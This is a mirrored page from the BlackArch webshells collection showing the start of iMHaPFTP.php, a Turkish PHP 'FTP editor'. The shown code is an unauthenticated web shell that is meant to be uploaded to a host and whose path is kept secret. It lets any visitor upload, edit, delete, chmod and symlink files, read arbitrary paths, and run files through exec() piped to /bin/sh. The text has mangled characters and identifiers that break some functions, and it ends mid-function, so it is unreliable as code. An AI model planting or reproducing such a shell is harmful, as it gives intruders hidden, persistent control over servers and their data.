mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 14:24:21 +00:00
2061 lines
52 KiB
PHP
2061 lines
52 KiB
PHP
|
<?php
|
|||
|
/*
|
|||
|
* iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
|
|||
|
* Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
|
|||
|
*
|
|||
|
* Bu Kod Tamamiyle <EFBFBD>zg<EFBFBD>r Yazilimdir.
|
|||
|
* K<EFBFBD>t<EFBFBD> Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
|
|||
|
* Programin amaci ftp olmadan hostunuza baglanti kurup
|
|||
|
* Dosya ekleyip kaldira bilmektir.
|
|||
|
* Kodumuz 6 Dilde yazilmistir.Server Diline G<EFBFBD>re Otomatik Secim Yapar.
|
|||
|
* -------------------------------------------------------------------------
|
|||
|
* Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
|
|||
|
* Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
|
|||
|
* -------------------------------------------------------------------------
|
|||
|
*
|
|||
|
* iMHaBiRLiGi PhpFtp V1.1
|
|||
|
* =========================================================================
|
|||
|
*
|
|||
|
* BeweiS
|
|||
|
* <BeweiS@imhabirligi.com>
|
|||
|
* iMHaBiRLiGi Administrator
|
|||
|
* Php-Asp-Programlama ve G<EFBFBD>venlik
|
|||
|
*
|
|||
|
* MicroP_
|
|||
|
* <MicroP_@imhabirligi.com>
|
|||
|
* iMHaBiRLiGi Administrator
|
|||
|
* Php-Asp-Programlama ve G<EFBFBD>venlik
|
|||
|
*
|
|||
|
* Libertical
|
|||
|
* <libertical@imhabirligi.com>
|
|||
|
* iMHaBiRLiGi Y<EFBFBD>netim
|
|||
|
* C++, Delphi,Programlama ve Linux Hastasi
|
|||
|
*
|
|||
|
* PowerGhost
|
|||
|
* <powerghost@imhabirligi.com>
|
|||
|
* iMHaBiRLiGi Sistem Danismani
|
|||
|
* Sistem Danismani
|
|||
|
*
|
|||
|
* BadSector
|
|||
|
* ozgurkaleli@yahoo.com
|
|||
|
* iMHaBiRLiGi Y<EFBFBD>netim
|
|||
|
* VicualBasic-Delphi Programlama
|
|||
|
* Sistemdanismani ve Linux Hastasi
|
|||
|
*
|
|||
|
* Bu kodun yaziliminda ismi gecen her arkadasimizin
|
|||
|
* Katkilari bulunmustur.
|
|||
|
* Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
|
|||
|
* Katkida bulunmuslardir.
|
|||
|
* NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
|
|||
|
* http://www.imhabirligi.com
|
|||
|
*<iMHaBiRLiGi@imhabirligi.com>
|
|||
|
/* ------------------------------------------------------------------------- */
|
|||
|
|
|||
|
/* Diller :
|
|||
|
* 'en' - English
|
|||
|
* 'de' - German
|
|||
|
* 'fr' - French
|
|||
|
* 'it' - Italian
|
|||
|
* 'se' - Swedish
|
|||
|
* 'auto' - autoselect
|
|||
|
*/
|
|||
|
$lang = 'auto';
|
|||
|
|
|||
|
/* Charset of your filenames:
|
|||
|
*/
|
|||
|
$charset = 'ISO-8859-1';
|
|||
|
|
|||
|
/* Homedir:
|
|||
|
* For example: './' - the script's directory
|
|||
|
*/
|
|||
|
$homedir = './';
|
|||
|
|
|||
|
/* Size of the D<EFBFBD>zenle textarea
|
|||
|
*/
|
|||
|
$D<>zenlecols = 80;
|
|||
|
$D<>zenlerows = 25;
|
|||
|
|
|||
|
/* -------------------------------------------
|
|||
|
* Optional configuration (reTasi # to enable)
|
|||
|
*/
|
|||
|
|
|||
|
/* Permission of created directories:
|
|||
|
* For example: 0705 would be 'drwx---r-x'.
|
|||
|
*/
|
|||
|
# $dirpermission = 0705;
|
|||
|
|
|||
|
/* Permission of created files:
|
|||
|
* For example: 0604 would be '-rw----r--'.
|
|||
|
*/
|
|||
|
# $filepermission = 0604;
|
|||
|
|
|||
|
/* Filenames related to the apache web server:
|
|||
|
*/
|
|||
|
$htaccess = '.htaccess';
|
|||
|
$htpasswd = '.htpasswd';
|
|||
|
|
|||
|
/* ------------------------------------------------------------------------- */
|
|||
|
|
|||
|
if (get_magic_quotes_gpc()) {
|
|||
|
array_walk($_GET, 'strip');
|
|||
|
array_walk($_POST, 'strip');
|
|||
|
array_walk($_REQUEST, 'strip');
|
|||
|
}
|
|||
|
|
|||
|
if (array_key_exists('image', $_GET)) {
|
|||
|
header('Content-Type: image/gif');
|
|||
|
die(getimage($_GET['image']));
|
|||
|
}
|
|||
|
|
|||
|
$delim = DIRECTORY_SEPARATOR;
|
|||
|
|
|||
|
if (function_exists('php_uname')) {
|
|||
|
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
|
|||
|
} else {
|
|||
|
$win = ($delim == '\\') ? true : false;
|
|||
|
}
|
|||
|
|
|||
|
if (!empty($_SERVER['PATH_TRANSLATED'])) {
|
|||
|
$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
|
|||
|
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
|
|||
|
$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
|
|||
|
} elseif (function_exists('getcwd')) {
|
|||
|
$scriptdir = getcwd();
|
|||
|
} else {
|
|||
|
$scriptdir = '.';
|
|||
|
}
|
|||
|
$homedir = relative2absolute($homedir, $scriptdir);
|
|||
|
|
|||
|
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
|
|||
|
|
|||
|
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
|
|||
|
$dir = relative2absolute($dir, $_POST['olddir']);
|
|||
|
}
|
|||
|
|
|||
|
$directory = simplify_path(addslash($dir));
|
|||
|
|
|||
|
$files = array();
|
|||
|
$action = '';
|
|||
|
if (!empty($_POST['submit_all'])) {
|
|||
|
$action = $_POST['action_all'];
|
|||
|
for ($i = 0; $i < $_POST['num']; $i++) {
|
|||
|
if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
|
|||
|
$files[] = $_POST["file$i"];
|
|||
|
}
|
|||
|
}
|
|||
|
} elseif (!empty($_REQUEST['action'])) {
|
|||
|
$action = $_REQUEST['action'];
|
|||
|
$files[] = relative2absolute($_REQUEST['file'], $directory);
|
|||
|
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
|
|||
|
$files[] = $_FILES['upload'];
|
|||
|
$action = 'upload';
|
|||
|
} elseif (array_key_exists('num', $_POST)) {
|
|||
|
for ($i = 0; $i < $_POST['num']; $i++) {
|
|||
|
if (array_key_exists("submit$i", $_POST)) break;
|
|||
|
}
|
|||
|
if ($i < $_POST['num']) {
|
|||
|
$action = $_POST["action$i"];
|
|||
|
$files[] = $_POST["file$i"];
|
|||
|
}
|
|||
|
}
|
|||
|
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
|
|||
|
$files[] = relative2absolute($_POST['create_name'], $directory);
|
|||
|
switch ($_POST['create_type']) {
|
|||
|
case 'directory':
|
|||
|
$action = 'create_directory';
|
|||
|
break;
|
|||
|
case 'file':
|
|||
|
$action = 'create_file';
|
|||
|
}
|
|||
|
}
|
|||
|
if (sizeof($files) == 0) $action = ''; else $file = reset($files);
|
|||
|
|
|||
|
if ($lang == 'auto') {
|
|||
|
if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
|
|||
|
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
|
|||
|
} else {
|
|||
|
$lang = 'en';
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$words = getwords($lang);
|
|||
|
|
|||
|
$cols = ($win) ? 4 : 7;
|
|||
|
|
|||
|
if (!isset($dirpermission)) {
|
|||
|
$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
|
|||
|
}
|
|||
|
if (!isset($filepermission)) {
|
|||
|
$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
|
|||
|
}
|
|||
|
|
|||
|
if (!empty($_SERVER['SCRIPT_NAME'])) {
|
|||
|
$self = html(basename($_SERVER['SCRIPT_NAME']));
|
|||
|
} elseif (!empty($_SERVER['PHP_SELF'])) {
|
|||
|
$self = html(basename($_SERVER['PHP_SELF']));
|
|||
|
} else {
|
|||
|
$self = '';
|
|||
|
}
|
|||
|
|
|||
|
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
|
|||
|
if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
|
|||
|
$apache = true;
|
|||
|
} else {
|
|||
|
$apache = false;
|
|||
|
}
|
|||
|
} else {
|
|||
|
$apache = true;
|
|||
|
}
|
|||
|
|
|||
|
switch ($action) {
|
|||
|
|
|||
|
case 'view':
|
|||
|
|
|||
|
if (is_script($file)) {
|
|||
|
|
|||
|
/* highlight_file is a mess! */
|
|||
|
ob_start();
|
|||
|
highlight_file($file);
|
|||
|
$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
|
|||
|
$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
|
|||
|
ob_end_clean();
|
|||
|
|
|||
|
html_header();
|
|||
|
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
|
|||
|
|
|||
|
<hr />
|
|||
|
|
|||
|
<table>
|
|||
|
<tr>
|
|||
|
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
|
|||
|
<pre style="margin-top: 0"><code>';
|
|||
|
|
|||
|
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
|
|||
|
|
|||
|
echo '</code></pre>
|
|||
|
</td>
|
|||
|
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
|
|||
|
<pre style="margin-top: 0">' . $src . '</pre>
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
header('Content-Type: ' . getmimetype($file));
|
|||
|
header('Content-Disposition: filename=' . basename($file));
|
|||
|
|
|||
|
readfile($file);
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'indir':
|
|||
|
|
|||
|
header('Pragma: public');
|
|||
|
header('Expires: 0');
|
|||
|
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
|||
|
header('Content-Type: ' . getmimetype($file));
|
|||
|
header('Content-Disposition: attachment; filename=' . basename($file) . ';');
|
|||
|
header('Content-Length: ' . filesize($file));
|
|||
|
|
|||
|
readfile($file);
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'upload':
|
|||
|
|
|||
|
$dest = relative2absolute($file['name'], $directory);
|
|||
|
|
|||
|
if (@file_exists($dest)) {
|
|||
|
listing_page(error('already_exists', $dest));
|
|||
|
} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
|
|||
|
listing_page(notice('uploaded', $file['name']));
|
|||
|
} else {
|
|||
|
listing_page(error('not_uploaded', $file['name']));
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'create_directory':
|
|||
|
|
|||
|
if (@file_exists($file)) {
|
|||
|
listing_page(error('already_exists', $file));
|
|||
|
} else {
|
|||
|
$old = @umask(0777 & ~$dirpermission);
|
|||
|
if (@mkdir($file, $dirpermission)) {
|
|||
|
listing_page(notice('created', $file));
|
|||
|
} else {
|
|||
|
listing_page(error('not_created', $file));
|
|||
|
}
|
|||
|
@umask($old);
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'create_file':
|
|||
|
|
|||
|
if (@file_exists($file)) {
|
|||
|
listing_page(error('already_exists', $file));
|
|||
|
} else {
|
|||
|
$old = @umask(0777 & ~$filepermission);
|
|||
|
if (@touch($file)) {
|
|||
|
D<EFBFBD>zenle($file);
|
|||
|
} else {
|
|||
|
listing_page(error('not_created', $file));
|
|||
|
}
|
|||
|
@umask($old);
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'execute':
|
|||
|
|
|||
|
chdir(dirname($file));
|
|||
|
|
|||
|
$output = array();
|
|||
|
$retval = 0;
|
|||
|
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
|
|||
|
|
|||
|
$error = ($retval == 0) ? false : true;
|
|||
|
|
|||
|
if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
|
|||
|
|
|||
|
if ($error) {
|
|||
|
listing_page(error('not_executed', $file, implode("\n", $output)));
|
|||
|
} else {
|
|||
|
listing_page(notice('executed', $file, implode("\n", $output)));
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'Sil':
|
|||
|
|
|||
|
if (!empty($_POST['no'])) {
|
|||
|
listing_page();
|
|||
|
} elseif (!empty($_POST['yes'])) {
|
|||
|
|
|||
|
$failure = array();
|
|||
|
$success = array();
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
if (del($file)) {
|
|||
|
$success[] = $file;
|
|||
|
} else {
|
|||
|
$failure[] = $file;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$message = '';
|
|||
|
if (sizeof($failure) > 0) {
|
|||
|
$message = error('not_Sild', implode("\n", $failure));
|
|||
|
}
|
|||
|
if (sizeof($success) > 0) {
|
|||
|
$message .= notice('Sild', implode("\n", $success));
|
|||
|
}
|
|||
|
|
|||
|
listing_page($message);
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
';
|
|||
|
|
|||
|
request_dump();
|
|||
|
|
|||
|
echo "\t<b>" . word('really_Sil') . '</b>
|
|||
|
<p>
|
|||
|
';
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
echo "\t" . html($file) . "<br />\n";
|
|||
|
}
|
|||
|
|
|||
|
echo ' </p>
|
|||
|
<hr />
|
|||
|
<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
|
|||
|
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'Degistir':
|
|||
|
|
|||
|
if (!empty($_POST['Yol'])) {
|
|||
|
|
|||
|
$dest = relative2absolute($_POST['Yol'], $directory);
|
|||
|
|
|||
|
if (!@file_exists($dest) && @Degistir($file, $dest)) {
|
|||
|
listing_page(notice('Degistird', $file, $dest));
|
|||
|
} else {
|
|||
|
listing_page(error('not_Degistird', $file, $dest));
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
<input type="hidden" name="action" value="Degistir" />
|
|||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
|||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
|||
|
<b>' . word('Degistir_file') . '</b>
|
|||
|
<p>' . html($file) . '</p>
|
|||
|
<hr />
|
|||
|
' . word('Yol') . ':
|
|||
|
<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
|
|||
|
<input type="submit" value="' . word('Degistir') . '" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'Tasi':
|
|||
|
|
|||
|
if (!empty($_POST['Yol'])) {
|
|||
|
|
|||
|
$dest = relative2absolute($_POST['Yol'], $directory);
|
|||
|
|
|||
|
$failure = array();
|
|||
|
$success = array();
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
$filename = substr($file, strlen($directory));
|
|||
|
$d = $dest . $filename;
|
|||
|
if (!@file_exists($d) && @Degistir($file, $d)) {
|
|||
|
$success[] = $file;
|
|||
|
} else {
|
|||
|
$failure[] = $file;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$message = '';
|
|||
|
if (sizeof($failure) > 0) {
|
|||
|
$message = error('not_Tasid', implode("\n", $failure), $dest);
|
|||
|
}
|
|||
|
if (sizeof($success) > 0) {
|
|||
|
$message .= notice('Tasid', implode("\n", $success), $dest);
|
|||
|
}
|
|||
|
|
|||
|
listing_page($message);
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
';
|
|||
|
|
|||
|
request_dump();
|
|||
|
|
|||
|
echo "\t<b>" . word('Tasi_files') . '</b>
|
|||
|
<p>
|
|||
|
';
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
echo "\t" . html($file) . "<br />\n";
|
|||
|
}
|
|||
|
|
|||
|
echo ' </p>
|
|||
|
<hr />
|
|||
|
' . word('Yol') . ':
|
|||
|
<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
|||
|
<input type="submit" value="' . word('Tasi') . '" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'Kopyala':
|
|||
|
|
|||
|
if (!empty($_POST['Yol'])) {
|
|||
|
|
|||
|
$dest = relative2absolute($_POST['Yol'], $directory);
|
|||
|
|
|||
|
if (@is_dir($dest)) {
|
|||
|
|
|||
|
$failure = array();
|
|||
|
$success = array();
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
$filename = substr($file, strlen($directory));
|
|||
|
$d = addslash($dest) . $filename;
|
|||
|
if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
|
|||
|
$success[] = $file;
|
|||
|
} else {
|
|||
|
$failure[] = $file;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$message = '';
|
|||
|
if (sizeof($failure) > 0) {
|
|||
|
$message = error('not_copied', implode("\n", $failure), $dest);
|
|||
|
}
|
|||
|
if (sizeof($success) > 0) {
|
|||
|
$message .= notice('copied', implode("\n", $success), $dest);
|
|||
|
}
|
|||
|
|
|||
|
listing_page($message);
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
if (!@file_exists($dest) && @Kopyala($file, $dest)) {
|
|||
|
listing_page(notice('copied', $file, $dest));
|
|||
|
} else {
|
|||
|
listing_page(error('not_copied', $file, $dest));
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
';
|
|||
|
|
|||
|
request_dump();
|
|||
|
|
|||
|
echo "\n<b>" . word('Kopyala_files') . '</b>
|
|||
|
<p>
|
|||
|
';
|
|||
|
|
|||
|
foreach ($files as $file) {
|
|||
|
echo "\t" . html($file) . "<br />\n";
|
|||
|
}
|
|||
|
|
|||
|
echo ' </p>
|
|||
|
<hr />
|
|||
|
' . word('Yol') . ':
|
|||
|
<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
|||
|
<input type="submit" value="' . word('Kopyala') . '" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'create_symlink':
|
|||
|
|
|||
|
if (!empty($_POST['Yol'])) {
|
|||
|
|
|||
|
$dest = relative2absolute($_POST['Yol'], $directory);
|
|||
|
|
|||
|
if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
|
|||
|
|
|||
|
if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
|
|||
|
|
|||
|
if (!@file_exists($dest) && @symlink($file, $dest)) {
|
|||
|
listing_page(notice('symlinked', $file, $dest));
|
|||
|
} else {
|
|||
|
listing_page(error('not_symlinked', $file, $dest));
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog" id="symlink">
|
|||
|
<tr>
|
|||
|
<td style="vertical-align: top">' . word('Yol') . ': </td>
|
|||
|
<td>
|
|||
|
<b>' . html($file) . '</b><br />
|
|||
|
<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
|
|||
|
<label for="checkbox_relative">' . word('relative') . '</label>
|
|||
|
<input type="hidden" name="action" value="create_symlink" />
|
|||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
|||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
<tr>
|
|||
|
<td>' . word('symlink') . ': </td>
|
|||
|
<td>
|
|||
|
<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
|||
|
<input type="submit" value="' . word('create_symlink') . '" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'D<>zenle':
|
|||
|
|
|||
|
if (!empty($_POST['save'])) {
|
|||
|
|
|||
|
$content = str_replace("\r\n", "\n", $_POST['content']);
|
|||
|
|
|||
|
if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
|
|||
|
listing_page(notice('saved', $file));
|
|||
|
} else {
|
|||
|
listing_page(error('not_saved', $file));
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
if (@is_readable($file) && @is_writable($file)) {
|
|||
|
D<EFBFBD>zenle($file);
|
|||
|
} else {
|
|||
|
listing_page(error('not_D<5F>zenleed', $file));
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
case 'permission':
|
|||
|
|
|||
|
if (!empty($_POST['set'])) {
|
|||
|
|
|||
|
$mode = 0;
|
|||
|
if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
|
|||
|
if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
|
|||
|
if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
|
|||
|
|
|||
|
if (@chmod($file, $mode)) {
|
|||
|
listing_page(notice('permission_set', $file, decoct($mode)));
|
|||
|
} else {
|
|||
|
listing_page(error('permission_not_set', $file, decoct($mode)));
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
$mode = fileperms($file);
|
|||
|
|
|||
|
echo '<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
|
|||
|
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
|
|||
|
|
|||
|
<hr />
|
|||
|
|
|||
|
<table id="permission">
|
|||
|
<tr>
|
|||
|
<td></td>
|
|||
|
<td style="border-right: 1px solid black">' . word('owner') . '</td>
|
|||
|
<td style="border-right: 1px solid black">' . word('group') . '</td>
|
|||
|
<td>' . word('other') . '</td>
|
|||
|
</tr>
|
|||
|
<tr>
|
|||
|
<td style="text-align: right">' . word('read') . ':</td>
|
|||
|
<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
|
|||
|
</tr>
|
|||
|
<tr>
|
|||
|
<td style="text-align: right">' . word('write') . ':</td>
|
|||
|
<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
|
|||
|
</tr>
|
|||
|
<tr>
|
|||
|
<td style="text-align: right">' . word('execute') . ':</td>
|
|||
|
<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
|
|||
|
<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<hr />
|
|||
|
|
|||
|
<input type="submit" name="set" value="' . word('set') . '" />
|
|||
|
|
|||
|
<input type="hidden" name="action" value="permission" />
|
|||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
|||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
|||
|
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
break;
|
|||
|
|
|||
|
default:
|
|||
|
|
|||
|
listing_page();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
/* ------------------------------------------------------------------------- */
|
|||
|
|
|||
|
function getlist ($directory) {
|
|||
|
global $delim, $win;
|
|||
|
|
|||
|
if ($d = @opendir($directory)) {
|
|||
|
|
|||
|
while (($filename = @readdir($d)) !== false) {
|
|||
|
|
|||
|
$path = $directory . $filename;
|
|||
|
|
|||
|
if ($stat = @lstat($path)) {
|
|||
|
|
|||
|
$file = array(
|
|||
|
'filename' => $filename,
|
|||
|
'path' => $path,
|
|||
|
'is_file' => @is_file($path),
|
|||
|
'is_dir' => @is_dir($path),
|
|||
|
'is_link' => @is_link($path),
|
|||
|
'is_readable' => @is_readable($path),
|
|||
|
'is_writable' => @is_writable($path),
|
|||
|
'size' => $stat['size'],
|
|||
|
'permission' => $stat['mode'],
|
|||
|
'owner' => $stat['uid'],
|
|||
|
'group' => $stat['gid'],
|
|||
|
'mtime' => @filemtime($path),
|
|||
|
'atime' => @fileatime($path),
|
|||
|
'ctime' => @filectime($path)
|
|||
|
);
|
|||
|
|
|||
|
if ($file['is_dir']) {
|
|||
|
$file['is_executable'] = @file_exists($path . $delim . '.');
|
|||
|
} else {
|
|||
|
if (!$win) {
|
|||
|
$file['is_executable'] = @is_executable($path);
|
|||
|
} else {
|
|||
|
$file['is_executable'] = true;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if ($file['is_link']) $file['target'] = @readlink($path);
|
|||
|
|
|||
|
if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
|
|||
|
if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
|
|||
|
|
|||
|
$files[] = $file;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
return $files;
|
|||
|
|
|||
|
} else {
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function sortlist (&$list, $key, $reverse) {
|
|||
|
|
|||
|
quicksort($list, 0, sizeof($list) - 1, $key);
|
|||
|
|
|||
|
if ($reverse) $list = array_reverse($list);
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function quicksort (&$array, $first, $last, $key) {
|
|||
|
|
|||
|
if ($first < $last) {
|
|||
|
|
|||
|
$cmp = $array[floor(($first + $last) / 2)][$key];
|
|||
|
|
|||
|
$l = $first;
|
|||
